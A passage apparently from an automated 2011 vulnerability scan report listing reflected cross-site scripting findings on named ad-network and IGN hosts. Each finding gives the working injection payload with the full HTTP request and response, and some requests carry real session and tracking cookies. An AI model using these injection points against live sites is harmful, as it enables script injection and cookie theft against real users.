document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653132c3"-alert(1)-"27b6307f1fc&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR"); var fscUrl = url; var fscUrlClickTagFound = false; va ...[SNIP]...
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 933c7"><script>alert(1)</script>c46c0426e93 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=933c7"><script>alert(1)</script>c46c0426e93 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEgDofeTOxem0_gMApf3YWMEr3kQAQnXe4HjQMTBDROpzYRLGofXKwaWNtdj1-GtHzOUqyENh2k1W2pFwJOjkpENaGP0tqhG0BtDC_eTH_Ts10GvA6WhyC22lBHkEPeNKFx7RiTWcHRNLuEX2-svGHkdhG53xdJo9qHwXLy45nY7LSpUbn803gUXikBp5CFzTHxBLV0jIUUb9PGuTCtW-hvx86uIjCl7RrDpkAZSszkN92RjKcOSHyDTphfUd0ZqQTAbIYvZtNr_wQwmIEY35OpKNWhyGwNPlAh_ANj4laYRoTBJxnGQ7wgWZt0CSpxlrfASU5W2a6su59vlF-h6V4zet13tlPhRMEiyYm825vPff2nJDmVgFpIKs_vIo7sFsppJ43d8oTEgInxyFT6vScD8wD9aZjmMC0w6HS0HlWcNr1j-PhGS2ikng608Ubz0iz0TtbwhgQZq5IdyfSisA1KqAwL3sZErWVr76O0bqQTEPkhkBBP4vNeu_uKiDKKl73FedJ05pAh6qV14YUcXNrVmSSI1FzEzQ65n9aZSqRKUiLFvw0_FzJQi642bOf20jjwau1yNWbWc_OZc_OPEEY_dnkrDVdmeoMCTOxN_xl7C-3y_RTPHX8tA53fNzl8qfH897V8IhWPCe1DLrZ9lRQtTCZwINCJg6hyABA61hUJaqPVyX7fV7Pa1PW0-yYXb_USKuin2pZCaBr_uY_2UBH6Bm4UktJmd6sVQvXXEqhe9E5LsneRLFWbUdQszzXxD5egB584f5Iq0VaWXCofBTTX6PHG8K6lFCCN0TTnR1jCog1stnuLrLH_TLw0g_9l8j595C25K_O7nXuUqzkznnHJS2oIivO1MtzkhTD8tggahFLAwdtimGiAzgIbfwh3tPXiXBZiPEc6jmaSPplk32IRb7Tl08IFN1OghxmtWT_y47n5TtZS9Ky93uZuiaOzgh6RPqobZokxjCycBjwJJ-OqeZ3YCRoZ5XICuXWVHfipzGbbMT7XgVwScM8a1QBrHN9hJ559oPfWNXLGQYJF8WI3xWHXIXB86oJHZOjQy7IdFPhSTsF2yrOAh9s72IpPTbIy0ryOZR5kHQoGKZaDQPufKDCKOsAs5UyVIQTo0ztnk49jL0nNFaq4usSu0TQiqXjP7CIAd_5FtzMDApKZjTZ9VwWqS_hi3W5FLLAcz8HdwETYSzM0iqfAGlpVHegt_TIDru8ZVGlo2JchDi2BE0kETeswJqfjIM8eqB1CZXkSQ7Z_VjVnYvzBVNyB9AksqD2lQZb2X0IEqN843HNpf9LL79Gl1KBsoCUhcPx0GvFd6LDM_NesCTjn8qfPanRhqfFt_Mz5uEh2A3HFoGkf8ppxZxL6925r_GgrDoF5KcCR0z_dNX3kzjeRcgqW8BhR69hQhpeZrZnEJ52ohaD3WrTkTUj4YJ6Td6PLaDgaJxtMnnZrfAlG0SSD0cpxrho96Q5aYPi9en1l66z-sdlCvM2HwHHvukFOG1d5EaBIpvNzbIjvRqOmzYDhYzHqcbaWBj06fa97gFmB5jdUYj5pSK3CD2Yuk0PK5FYetxUklFsdind5sgdq4uZcD2KLx9Zf7jaxnwz6suaPAnsGTiQgiUvKmhf1LhrytQYKxDy-h4T29iDJXVr_vHZNnZTSMo3FOqO76V7e32Mz948gl-62XtaGUS8uw5NCpnBNXGUaigKHIg84ueIc4t5Yp3YWsvWh2i358DyJOyzgpnBHfTKfL-U_Busa7oEsjSep6DjzyTifPlN_P4smDk3kLq_iHqbXQ5svnKXdR0fKJFj2seLH8BbDFMsPiVsBIQ44v1dSgCalvY0FxkkJ5w0OZeWQP34jwLIAF168EspxmNyBZAxjbmEt8kjG7dRMykkE2LHXhz6x23r28D5B1-HnnnOalxwc8pVPIG67O2v9MtuGBypG0oO1sVM2Vbs7HFOP9G8F0R3RxUgEDCioFUEKPhCNOF99OExqDKIS0y-D3H8kAPjeIydjzyH2Ws7PKyE1dGY4WEg1BMpUBtxwX2H-7BKKuqPq2iSXQ7keQevoGn3niEhwrkx3I523rYfTIHt_4ntge3wT6HrPHWBJpD6Hr91CxZq9sV9Jmp33y8raIDjGaQc_8c0sEToR_ODvxgcgJ32KFhukOoA2cRquiPMf-CiwpIi4ayv6yWP-tXJ__VAnBFQL8j9ZaHEtyQCLoYLPIaWZ3CmWGBp_xNH3WlqbXOyrf_ATBbMNQCTCxOAxrjPhFf5rtBKDWKm24urmdIW_ZXAbYCZmLsz6YiVpaNRjSC9cVWjph0vEeVDn94cCqpnjE0z1BuYxXU6aN8KvfgQRgY4ZaCnGHk-ja9faWwfL-_-bPH3YFMHRKzulr4fOZJphXH_Th5iLN0VczjS8Jh9TEFyiFtC1iUdTIWwbUQ3HeHZgtn1yA0PmWEs3TAjOPMDh8jx0WcV7eT-TG33S7CRXLm9kG5yXyNmxCrzJ; fc=8Kodsw1QIRNJBnpSjhgJ0uErbJkTJYsNaCBFpaSI5yP-4Y1aL5T0hqj7dZyIiRNIWMZgDtcnKM_xOWbKnaMIO3_WyzVPxgN3VkTg_cPuFqziwJJKZupkpjfaBrjFc6z7RfOX1MD02-o6SZ1b0c_HcUiZ1Q4B83ZCB0ZNq2R2Ygc; pf=vcPDWdxa5bRnzYCFna8dt7hwFpEjJFamBf-ed9eCgkru2q8_Jo62qDoNU1sRcsTDbsXLbP8cgvu5kdFpiCdvW34lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15011%7C15011%7C15012%7Cundefined%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C14983%7C15011%7C15003; rv=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 06-Aug-2011 02:33:21 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 07 Feb 2011 02:33:20 GMT Content-Length: 377
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 482b7'%3balert(1)//1faf0348dc7 was submitted in the admeld_adprovider_id parameter. This input was echoed as 482b7';alert(1)//1faf0348dc7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73482b7'%3balert(1)//1faf0348dc7&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045601273&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3Fign105ab01%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E958cbd566d4&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8e99'%3balert(1)//df4307a598c was submitted in the admeld_callback parameter. This input was echoed as f8e99';alert(1)//df4307a598c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf8e99'%3balert(1)//df4307a598c HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045601273&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3Fign105ab01%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E958cbd566d4&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 543f1<script>alert(1)</script>501477c8a8d was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=amRZRPmRXMjwy5CP_1630363543f1<script>alert(1)</script>501477c8a8d HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A0C863B2E23E60DAB8555153C303FBD7; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 07 Feb 2011 01:03:45 GMT Connection: close
1.51. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85eca"-alert(1)-"6337c1d9bd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1§ion=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&85eca"-alert(1)-"6337c1d9bd9=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:04:26 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Mon, 07 Feb 2011 01:04:26 GMT Pragma: no-cache Content-Length: 5050 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?85eca"-alert(1)-"6337c1d9bd9=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&s=1678185&_salt=4252970181";var RM_POP_COOKIE_NAME='ym ...[SNIP]...
1.52. http://au.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://au.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66893"-alert(1)-"f7383b9f650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?66893"-alert(1)-"f7383b9f650=1 HTTP/1.1 Host: au.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Video Games, Cheat ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://au.ign.com/?66893"-alert(1)-"f7383b9f650=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.53. http://au.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://au.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c49dc"><script>alert(1)</script>ff0d8373217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?c49dc"><script>alert(1)</script>ff0d8373217=1 HTTP/1.1 Host: au.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9ae6f<script>alert(1)</script>fb23142505d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=39ae6f<script>alert(1)</script>fb23142505d&c2=6035537&c3=4732978&c4=40554329&c5=56586626&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Feb 2011 00:56:26 GMT Date: Mon, 07 Feb 2011 00:56:26 GMT Connection: close Content-Length: 3603
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload bc307<script>alert(1)</script>c7e2144cf48 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=18&c4=13378&c5=&c6=&c10=3189128bc307<script>alert(1)</script>c7e2144cf48&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=22002200&pos=leaderboard&rnd=316990301 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Feb 2011 02:17:50 GMT Date: Mon, 07 Feb 2011 02:17:50 GMT Connection: close Content-Length: 3594
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload f4867<script>alert(1)</script>f5db88b0abc was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=18&c4=13378&c5=&c6=&c10=3189128&c15=f4867<script>alert(1)</script>f5db88b0abc HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=22002200&pos=leaderboard&rnd=316990301 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Feb 2011 02:17:50 GMT Date: Mon, 07 Feb 2011 02:17:50 GMT Connection: close Content-Length: 3594
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload c2ee2<script>alert(1)</script>bd3b80d854e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035537c2ee2<script>alert(1)</script>bd3b80d854e&c3=4732978&c4=40554329&c5=56586626&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Feb 2011 00:56:26 GMT Date: Mon, 07 Feb 2011 00:56:26 GMT Connection: close Content-Length: 3603
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 9dc11<script>alert(1)</script>92bb80ca587 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035537&c3=47329789dc11<script>alert(1)</script>92bb80ca587&c4=40554329&c5=56586626&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Feb 2011 00:56:26 GMT Date: Mon, 07 Feb 2011 00:56:26 GMT Connection: close Content-Length: 3603
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 3c4c3<script>alert(1)</script>6d16a689337 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=405543293c4c3<script>alert(1)</script>6d16a689337&c5=56586626&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Feb 2011 00:56:26 GMT Date: Mon, 07 Feb 2011 00:56:26 GMT Connection: close Content-Length: 3603
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ae4e2<script>alert(1)</script>f3f65b08d45 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=40554329&c5=56586626ae4e2<script>alert(1)</script>f3f65b08d45&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Feb 2011 00:56:27 GMT Date: Mon, 07 Feb 2011 00:56:27 GMT Connection: close Content-Length: 3603
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 518e0<script>alert(1)</script>654ad6dd3fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=40554329&c5=56586626&c6=518e0<script>alert(1)</script>654ad6dd3fa HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Feb 2011 00:56:27 GMT Date: Mon, 07 Feb 2011 00:56:27 GMT Connection: close Content-Length: 3603
1.62. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bluray.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21b33"><script>alert(1)</script>a678f7db862 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
